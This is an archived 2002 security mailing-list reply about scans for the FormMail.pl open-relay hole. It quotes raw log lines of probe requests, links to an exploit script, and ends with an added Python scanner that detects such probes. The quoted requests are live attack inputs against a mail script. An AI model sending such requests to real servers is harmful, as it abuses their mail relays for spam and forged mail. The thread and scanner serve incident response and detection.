RE: Matt Wright FormMail Attacks

From: Jose Nazario (joseat_private)
Date: Mon Jan 14 2002 - 10:19:28 PST


On Mon, 14 Jan 2002, Turner, Keith wrote:

> My guess is one of the following: 1) Someone looking to send spam
> through someone else's webserver. (Seems like that would be very
> inefficient.) 2) Someone looking for a new exploit, maybe testing the
> waters for a new worm. 3) Someone looking for a way to "forge" emails,
> making it look like it came from an email address of the affected
> domain. The email header would go right back to an address in the
> "forged" domain.
    
my formmail attacks have this general structure:

GET
/cgi-bin/formmail.pl?email=someone%40aol%2Ecom&subject=hostname%2Edomain%2Ecom%2Fcgi%2Dbin%2Fformail%2Epl&recipient=c0mik%40hotmail%2Ecom&msg=w00t

recipients have been:

c0mikat_private (msg=w00t)
jersyvipsat_private (again, msg=w00t)
w00tw00tat_private (yet again, msg=w00t)
Heyheyremeberme9at_private (msg=w00t)
GUILTYBIZat_private (msg=w00t)

i don't know if any of those accounts are valid.

those are just in the past 10,000 lines or so from my error logs (i don't
use FormMail.pl). the use of 'w00t' suggests a younger element (w00t is
L33T and all); it's doubtful it's simply spam, but rather 'hey, this site's
got vulnerable cgi-bin stuff'.
    
spawn an xterm using formmail:
http://packetstorm.widexs.nl/0007-exploits/formmail-xploit.pl

view env vars using formmail:
http://packetstorm.widexs.nl/advisories/blackwatchlabs/BWL-00-06.txt
    
but i did find that others have been seeing this same basic pattern:

web logs posted on http://icosym-nt.cvut.cz/musage/A2001-12.txt
/cgi-bin/formmail.pl?email=f2%40aol%2ecom&subject=icosym%2ecvut%2ecz%2fcgi%2dbin%2fformmail%2epl&recipient=nightauditer%40aol%2ecom&msg=w00t
/cgi-bin/formmail.pl?recipient=rmitchell9601at_private,&subject=are%20you%20interested%20in%20applying%20your%20skills&email=charresoneeat_private&=http://icosym-nt.cvut.cz/cgi-bin/formmail.pl
/cgi-bin/formmail.pl?recipient=rmitchell9601at_private,&subject=find%20that%20long%20lost%20friend%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.&email=lcordeeat_private&=http://icosym-nt.cvut.cz/cgi-bin/formmail.pl

http://www.google.com/search?q=cache:L5KlWd3G3D4C:www.kolobrzeg.pl/stats1169/statslog.20011205+formmail+w00t&hl=en
1Cust129.tnt3.richmond.va.da.uu.net - - [05/Dec/2001:00:10:01 +0100] "GET
/cgi-bin/formmail.pl?email=f2%40aol%2Ecom&subject=www%2Ekolobrzeg%2Epl%2Fcgi%2Dbin%2Fformmail%2Epl&recipient=dreads%40aol%2Ecom&msg=w00t
HTTP/1.1Content-Type: application/x-www-form-urlencoded" 404 190 ""
"Gozilla/4.0 (compatible; MSIE 5.5; windows 2000)"
    
etc etc ... formmail + w00t on google brings up a bunch. from a few
more lists, more discussion:

http://ntbugtraq.net/archive/107/244789
http://citadelle.intrinsec.com/mailing/current/HTML/ml_mobile_code/0487.html

hope this helps. it's a bit older, and not a highly visible item, but it's
real.
    
____________________________
jose nazario                                     joseat_private
PGP: 89 B0 81 DA 5B FD 7E 00  99 C3 B2 CD 48 A0 07 80
PGP key ID 0xFD37F4E5 (pgp.mit.edu)
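The thread shows how the probes look in raw access logs; the following is an added example (not code from the post or from the list) of a small Python log scanner that picks those requests out. It parses NCSA-style combined log lines, URL-decodes the query string of any request for formmail.pl, and reports the recipient, sender and the indicators the thread describes (the msg=w00t marker, a subject that names the probed host and script path, and a 404 showing the script is absent). The log lines in SAMPLE_LOG are constructed for the demo; the first mirrors the kolobrzeg.pl entry quoted above, the rest are invented.

```python
"""Flag FormMail probe requests in NCSA combined-format web access logs.

Added example, not code from the original post. Each line is parsed, the
query string of any request for formmail.pl is decoded, and the fields a
responder wants (recipient, email, subject, msg) are reported with the
reasons the request looks like the scan pattern discussed in the thread.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log. Line 1 mirrors the kolobrzeg.pl entry from the
# thread (including the odd "HTTP/1.1Content-Type: ..." request line);
# the other hosts and addresses are made up for this demo.
SAMPLE_LOG = """\
1Cust129.tnt3.richmond.va.da.uu.net - - [05/Dec/2001:00:10:01 +0100] "GET /cgi-bin/formmail.pl?email=f2%40aol%2Ecom&subject=www%2Ekolobrzeg%2Epl%2Fcgi%2Dbin%2Fformmail%2Epl&recipient=dreads%40aol%2Ecom&msg=w00t HTTP/1.1Content-Type: application/x-www-form-urlencoded" 404 190 "" "Gozilla/4.0 (compatible; MSIE 5.5; windows 2000)"
192.0.2.10 - - [05/Dec/2001:00:11:15 +0100] "GET /index.html HTTP/1.1" 200 1234 "" "Mozilla/4.0"
192.0.2.11 - - [05/Dec/2001:00:12:02 +0100] "GET /cgi-bin/FormMail.pl?recipient=someone%40example.net&subject=hello&email=x%40example.org&msg=w00t HTTP/1.0" 404 190 "" "Mozilla/4.0"
192.0.2.12 - - [05/Dec/2001:00:13:30 +0100] "POST /cgi-bin/formmail.pl HTTP/1.1" 200 512 "http://www.example.com/contact.html" "Mozilla/4.0"
"""

# host ident user [timestamp] "METHOD target [protocol...]" status size ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Return a dict of log fields plus decoded path/query, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # First value wins; blank values kept so "&=http://..." style junk
    # (seen in the icosym logs in the thread) does not break parsing.
    rec["query"] = {k: v[0] for k, v in
                    parse_qs(parts.query, keep_blank_values=True).items()}
    return rec


def is_formmail_probe(rec):
    """A GET for formmail.pl carrying mail parameters in the query string.

    Legitimate use of the script is a POST from the site's own form, so
    GET requests with a recipient parameter are the thing to look at.
    """
    if rec is None or not rec["path"].lower().endswith("/formmail.pl"):
        return False
    return rec["method"] == "GET" and "recipient" in rec["query"]


def probe_reasons(rec):
    """Indicators from the thread that make a hit look like the scan."""
    q = rec["query"]
    reasons = []
    if q.get("msg") == "w00t":
        reasons.append("msg=w00t marker")
    if "formmail.pl" in q.get("subject", "").lower():
        reasons.append("subject names probed host/script (callback tag)")
    if rec["status"] == "404":
        reasons.append("script absent: scan hit nothing")
    return reasons


def scan_log(text):
    """Return one summary dict per probe-looking request in the log."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if is_formmail_probe(rec):
            hits.append({
                "host": rec["host"],
                "recipient": rec["query"].get("recipient"),
                "email": rec["query"].get("email"),
                "subject": rec["query"].get("subject"),
                "reasons": probe_reasons(rec),
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["host"], "->", hit["recipient"], "|", "; ".join(hit["reasons"]))
```

Run against a real access_log, the same scanner turns the error-log noise the post describes into a list of source hosts and the mailbox addresses the probes were trying to reach, which is what you want for an abuse report; on a host that does run FormMail, a 200 rather than a 404 on such a hit means the relay attempt may actually have sent mail.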
    
    
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
    



This archive was generated by hypermail 2b30 : Mon Jan 14 2002 - 14:32:00 PST